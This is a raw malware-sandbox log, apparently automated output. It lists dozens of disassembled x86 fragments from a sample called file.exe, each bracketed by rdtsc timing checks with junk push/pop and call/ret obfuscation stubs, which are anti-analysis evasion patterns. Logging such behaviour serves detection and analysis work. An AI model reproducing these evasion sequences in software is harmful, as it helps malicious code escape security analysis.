                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655C7 second address: D655D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655D2 second address: D655FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007FD2D0DFA0E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2D0DFA0D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D655FA second address: D65662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 call 00007FD2D0B60AF4h 0x0000000c mov edi, ecx 0x0000000e pop esi 0x0000000f or di, B3DDh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD2D0B60AE8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2A84h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a jg 00007FD2D0B60AECh 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jno 00007FD2D0B60AECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65662 second address: D65668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D671F4 second address: D671F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65E3A second address: D65E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65E40 second address: D65E45 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D684B7 second address: D684BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D689F3 second address: D68A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007FD2D0B60AF6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FD2D0B60AE8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1CA1h], eax 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FD2D0B60AE8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3653h] 0x00000054 jbe 00007FD2D0B60AE8h 0x0000005a mov ebx, eax 0x0000005c push 00000000h 0x0000005e xchg eax, esi 0x0000005f pushad 0x00000060 push esi 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 pop esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FD2D0B60AF7h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68A91 second address: D68A9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68A9E second address: D68AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6989D second address: D698A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D698A3 second address: D69908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD2D0B60AE8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+1245DA00h], eax 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1BCFh], edi 0x00000036 push 00000000h 0x00000038 mov edi, 7DF52119h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FD2D0B60AF3h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69908 second address: D69912 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D0DFA0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69AEA second address: D69AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D90E second address: D6D968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FD2D0DFA0CFh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FD2D0DFA0C8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov ebx, 063BFB7Ch 0x0000002f push 00000000h 0x00000031 jmp 00007FD2D0DFA0D2h 0x00000036 push eax 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D968 second address: D6D96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D96C second address: D6D970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EA03 second address: D6EA07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23ED1 second address: D23ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC11 second address: D6EC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23ED5 second address: D23EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FD2D0DFA0C6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC17 second address: D6EC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE5 second address: D23EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC1B second address: D6ECA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov bx, si 0x0000000f push dword ptr fs:[00000000h] 0x00000016 and edi, 7520EBC3h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+122D1908h] 0x00000029 mov eax, dword ptr [ebp+122D138Dh] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007FD2D0B60AE8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov edi, eax 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FD2D0B60AE8h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 xor edi, dword ptr [ebp+122D3563h] 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 push ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F46 second address: D70F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0DFA0D1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ECA9 second address: D6ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ECAE second address: D6ECB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E7F second address: D72E84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E84 second address: D72E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E91 second address: D72E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD2D0B60AE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E9C second address: D72F01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD2D0DFA0C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, cx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FD2D0DFA0C8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a add dword ptr [ebp+122D32EDh], ecx 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D35BFh] 0x00000038 xchg eax, esi 0x00000039 ja 00007FD2D0DFA0D7h 0x0000003f js 00007FD2D0DFA0D1h 0x00000045 jmp 00007FD2D0DFA0CBh 0x0000004a push eax 0x0000004b pushad 0x0000004c jo 00007FD2D0DFA0CCh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F54 second address: D73F6B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2D0B60AE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FD2D0B60AE8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F6B second address: D73F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F80 second address: D73FB5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D334Ah], edx 0x00000013 push 00000000h 0x00000015 mov edi, ecx 0x00000017 push 00000000h 0x00000019 call 00007FD2D0B60AEEh 0x0000001e mov ebx, dword ptr [ebp+122D36EBh] 0x00000024 pop ebx 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73FB5 second address: D73FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD2D0DFA0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73FBF second address: D73FDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2D0B60AECh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7202A second address: D7203F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730C9 second address: D730CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730CD second address: D730DB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7203F second address: D720E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD2D0B60AEDh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FD2D0B60AE8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a stc 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov ebx, dword ptr [ebp+122D36BFh] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+122D2E9Dh], ebx 0x00000045 mov eax, dword ptr [ebp+122D12BDh] 0x0000004b sub dword ptr [ebp+122D2E0Eh], ecx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007FD2D0B60AE8h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d sub dword ptr [ebp+122D1ADDh], edi 0x00000073 push eax 0x00000074 push ecx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730DB second address: D730DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D720E3 second address: D720E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730DF second address: D73154 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, si 0x0000000b push dword ptr fs:[00000000h] 0x00000012 jmp 00007FD2D0DFA0CCh 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e xor dword ptr [ebp+122D2C42h], esi 0x00000024 mov eax, dword ptr [ebp+122D1725h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007FD2D0DFA0C8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2E94h], ecx 0x0000004a push FFFFFFFFh 0x0000004c movsx edi, ax 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FD2D0DFA0D5h 0x00000058 push eax 0x00000059 pop eax 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73154 second address: D73170 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0B60AEFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73170 second address: D7317A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D752BF second address: D752C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D752C5 second address: D752E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jns 00007FD2D0DFA0C6h 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7412B second address: D7414A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7414A second address: D7414E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7414E second address: D74158 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7637A second address: D7637E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75456 second address: D75464 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7637E second address: D7640E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FD2D0DFA0D2h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FD2D0DFA0C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007FD2D0DFA0CDh 0x00000034 jmp 00007FD2D0DFA0D1h 0x00000039 push 00000000h 0x0000003b jmp 00007FD2D0DFA0D1h 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FD2D0DFA0D7h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75464 second address: D75469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7640E second address: D76418 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7556C second address: D75575 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D774C5 second address: D77512 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0CCh 0x00000008 jbe 00007FD2D0DFA0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 sbb di, 0E1Bh 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 mov dword ptr [ebp+122D2E5Ah], edi 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007FD2D0DFA0C8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jbe 00007FD2D0DFA0C8h 0x00000045 push esi 0x00000046 pop esi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7662D second address: D76631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76631 second address: D76637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76637 second address: D76641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD2D0B60AE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76641 second address: D76652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7772A second address: D77734 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77734 second address: D77761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D0DFA0D6h 0x00000008 ja 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD2D0DFA0C8h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CFB4 second address: D7CFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80A8F second address: D80AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AAE second address: D80AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AB2 second address: D80AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AB6 second address: D80ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80ABC second address: D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0CDh 0x00000009 jmp 00007FD2D0DFA0D0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80ADD second address: D80AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AE1 second address: D80AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C3E second address: D80C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C42 second address: D80C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C4C second address: D80C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
